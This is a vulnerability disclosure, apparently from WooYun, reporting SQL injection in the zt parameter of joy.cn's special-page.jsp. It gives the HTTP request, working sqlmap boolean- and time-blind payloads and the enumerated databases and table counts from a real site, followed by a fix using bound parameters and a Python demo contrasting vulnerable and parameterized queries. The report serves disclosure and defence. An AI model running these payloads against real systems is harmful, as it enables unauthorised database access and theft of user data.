
SQL injection vulnerability on the joy.cn (激动网) main site

2015-08-09 13:45

Code area:

POST /special-page.jsp?zt=1 HTTP/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.joy.cn/
Cookie: JSESSIONID=02DB3555D41D5B8EF0C67471ABD70DB5
Host: www.joy.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

pageNum=1&saction=search

Proof of vulnerability (sqlmap output; the injection point is the zt query-string parameter, not the POST body):

Code area:

---
Parameter: zt (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: zt=-2879' OR 2165=2165 AND 'AUrp'='AUrp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: zt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))soje) AND 'KTia'='KTia
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.12
available databases [4]:
[*] information_schema
[*] test
[*] wapcms
[*] waptranscode



Database: wapcms
+-----------------------------------+----------+
| Table                             | Entries  |
+-----------------------------------+----------+
| reader_statistics_data            | 12456775 |
| reader_voteresult_data            | 10085592 |
| reader_system_log                 | 5855412  |
| reader_inter_vote_subitem         | 2567636  |
| reader_resource_video_suite       | 2087161  |
| reader_order_user_house           | 1972867  |
| statistics_url_hour_data_report   | 1765332  |
| reader_resource_p_res_info        | 1004886  |
| statistics_url_data_report        | 961519   |
| reader_resource_all               | 230662   |
| reader_resource_video             | 221989   |
| reader_inter_msgrecord            | 192016   |
| reader_resource_restype           | 165123   |
| statistics_ip_report              | 145163   |
| reader_video_targetfile_status    | 90159    |
| reader_statistics_url_config_auth | 75085    |
| reader_video_hot_comment          | 53641    |
| reader_bussiness_column           | 48737    |
| temp_dxn_type                     | 37545    |
| temp_dxn_file                     | 37450    |
| temp_dxn_resource                 | 31594    |
| reader_resource_material          | 29651    |
| wo_push                           | 28767    |
| reader_inter_msglog               | 28073    |
| wo_video                          | 21750    |
| reader_video_task_targetfile      | 18328    |
| reader_ios_token                  | 17283    |
| reader_system_ipinfo_20111207     | 11836    |
| reader_bussiness_template         | 9550     |
| reader_resource_info              | 8700     |
| reader_inter_vote_item            | 5177     |
| reader_resource_pack_fee          | 4339     |
| reader_system_keyword             | 3914     |
| reader_video_task_file            | 3842     |
| reader_push_message               | 2462     |
| temp_dxn_suite                    | 2298     |
| reader_statistics_url_config      | 1989     |
| reader_resource_author            | 1772     |
| ugc_user                          | 1489     |
| reader_comment_user               | 1447     |
| rank_third                        | 1260     |
| reader_inter_vote                 | 1245     |
| reader_offline_log                | 1175     |
| reader_system_ipinfo20110416      | 1069     |
| reader_system_ipinfo20100723      | 890      |
| reader_user_points_record         | 770      |
| temp_dxn_suite1                   | 766      |
| reader_resource_type              | 740      |
| reader_video_task                 | 657      |
| reader_system_roles_privileges    | 596      |
| media                             | 588      |
| reader_tag_template               | 478      |
| statistics_url_config_group_rel   | 430      |
| reader_statistics_access_log      | 419      |
| reader_adapter_comadapterrule     | 400      |
| reader_system_users_groups        | 324      |
| reader_tag_userdef                | 281      |
| reader_system_ipinfo              | 256      |
| reader_adapter_adapterrule        | 244      |
| reader_adapter_adapter            | 221      |
| video_news                        | 182      |
| reader_system_users_roles         | 139      |
| reader_useragent_ua               | 133      |
| reader_system_variables           | 117      |
| reader_tag_sys                    | 117      |
| reader_bussiness_packgroup        | 102      |
| reader_useragent_ua_g_u           | 102      |
| reader_system_user                | 101      |
| reader_system_privilege           | 90       |
| reader_system_menu                | 79       |
| reader_resource_material_cata     | 62       |
| statplaytop                       | 60       |
| reader_resource_ebook_chapter     | 50       |
| reader_activity_join_record       | 45       |
| pic_news                          | 32       |
| reader_ad_info                    | 26       |
| reader_system_role                | 18       |
| reader_bussiness_tem_catalog      | 17       |
| reader_activity_videos            | 15       |
| reader_useragent_ua_group         | 15       |
| statistics_url_config_group       | 15       |
| reader_statistics_data_report     | 11       |
| reader_system_group               | 11       |
| reader_bussiness_tem_default      | 10       |
| reader_inter_msgboard             | 8        |
| user_info                         | 8        |
| reader_adapter_type               | 7        |
| reader_bussiness_tem_type         | 6        |
| reader_actiivty_award_user        | 5        |
| reader_statistics_channel         | 5        |
| reader_activity                   | 4        |
| reader_focus_pic                  | 4        |
| special_mgr                       | 4        |
| reader_partner_channel_child      | 3        |
| reader_resource_ebook_tome        | 3        |
| reader_resource_referen           | 2        |
| reader_video_transcode_server     | 2        |
| reader_bussiness_pg_area          | 1        |
| reader_bussiness_product          | 1        |
| reader_fee_fee                    | 1        |
| reader_partner_channel            | 1        |
| reader_partner_spcp               | 1        |
| reader_system_keyword_type        | 1        |
| reader_video_cover                | 1        |
| reader_vote_item_custom           | 1        |
+-----------------------------------+----------+

Fix:

The zt query-string parameter is spliced into a quoted SQL string literal (both payloads open with a ' that closes the literal and end with 'AUrp'='AUrp or 'KTia'='KTia to re-balance the quote the application appends), so the query must take zt as a bound parameter (java.sql.PreparedStatement with a ? placeholder) rather than by string concatenation. The only legitimate value seen here is the integer 1, so zt can additionally be validated as an integer before the query is built. Note that the injected queries run with a database account that can read all four databases, including the CMS user and role tables listed above, so the account privileges deserve a review as well.
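The following is an added example, not code from the original report or from joy.cn: the zt lookup written the vulnerable way (string concatenation into a quoted literal) beside its parameterized fix, both driven with the two sqlmap payloads quoted in the proof section. SQLite in memory stands in for MySQL; the table name, columns and rows are constructed here, since the real schema behind special-page.jsp is unknown, and because SQLite has no SLEEP() a scaled-down emulation is registered so that the time-based payload is observable.

```python
"""Added example: concatenated vs. parameterized lookup of the zt parameter,
exercised with the boolean-based and time-based payloads from the sqlmap output.
Everything below (table, rows, SLEEP emulation) is constructed for this demo."""
import sqlite3
import time

# Payloads exactly as reported by sqlmap in the proof section.
BOOL_TRUE = "-2879' OR 2165=2165 AND 'AUrp'='AUrp"
# Constructed "false twin" of the boolean payload (sqlmap pairs a true and a
# false condition and compares the two responses).
BOOL_FALSE = "-2879' OR 2165=2166 AND 'AUrp'='AUrp"
TIME_PAYLOAD = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))soje) AND 'KTia'='KTia"

SLEEP_SCALE = 0.02  # SLEEP(5) becomes 0.1 s so the example runs quickly

# Constructed sample data for a hypothetical "topics" table keyed by zt.
SAMPLE_ROWS = [
    ("1", "Topic one", 1),
    ("2", "Topic two", 1),
    ("3", "Unpublished draft", 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    # Emulate MySQL SLEEP(n): pause, then return 0 exactly as MySQL does.
    conn.create_function("SLEEP", 1, lambda n: time.sleep(n * SLEEP_SCALE) or 0)
    conn.execute("CREATE TABLE topics (zt TEXT, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO topics VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, zt):
    """zt is spliced into a quoted literal. The payload's leading quote closes
    the literal and its trailing 'AUrp'='AUrp re-balances the quote that the
    application appends, so the injected OR/AND terms become part of WHERE."""
    sql = "SELECT title FROM topics WHERE zt = '" + zt + "' AND published = 1"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, zt):
    """Bound parameter: the whole payload is compared as an opaque string and
    never reaches the SQL parser."""
    sql = "SELECT title FROM topics WHERE zt = ? AND published = 1"
    return [row[0] for row in conn.execute(sql, (zt,))]


def boolean_blind_differs(lookup, conn):
    """sqlmap's boolean-based test: the true/false payload pair yields different
    result sets only when the input reaches the query unescaped."""
    return lookup(conn, BOOL_TRUE) != lookup(conn, BOOL_FALSE)


def time_blind_delay(lookup, conn):
    """Seconds spent answering the time-based payload (sqlmap's time-based test
    looks for this delay in the HTTP response time)."""
    start = time.monotonic()
    lookup(conn, TIME_PAYLOAD)
    return time.monotonic() - start


if __name__ == "__main__":
    conn = make_db()
    print("normal zt=1:", lookup_vulnerable(conn, "1"), lookup_fixed(conn, "1"))
    print("boolean blind, vulnerable:", boolean_blind_differs(lookup_vulnerable, conn))
    print("boolean blind, fixed:     ", boolean_blind_differs(lookup_fixed, conn))
    print("time blind, vulnerable: %.2fs" % time_blind_delay(lookup_vulnerable, conn))
    print("time blind, fixed:      %.2fs" % time_blind_delay(lookup_fixed, conn))
```

With the concatenated query the true payload returns every published row (the injected OR defeats the zt filter) while the false twin returns nothing, which is the differential sqlmap reports as "boolean-based blind"; the time-based payload stalls the query for the emulated SLEEP and still returns no rows, because SLEEP() evaluates to 0. The parameterized version returns an empty result for every payload with no delay, since the payload is only ever compared as a literal value of zt.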

Source: www.wooyun.org/bugs/wooyun-2015-0122648
